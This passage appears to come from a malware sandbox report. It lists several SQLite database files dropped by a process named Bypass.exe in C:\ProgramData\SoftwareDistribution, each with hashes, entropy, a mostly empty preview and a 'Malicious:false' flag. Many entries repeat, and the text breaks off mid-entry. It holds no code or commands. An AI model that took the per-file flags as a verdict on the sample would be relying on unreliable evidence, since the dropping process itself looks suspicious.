                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
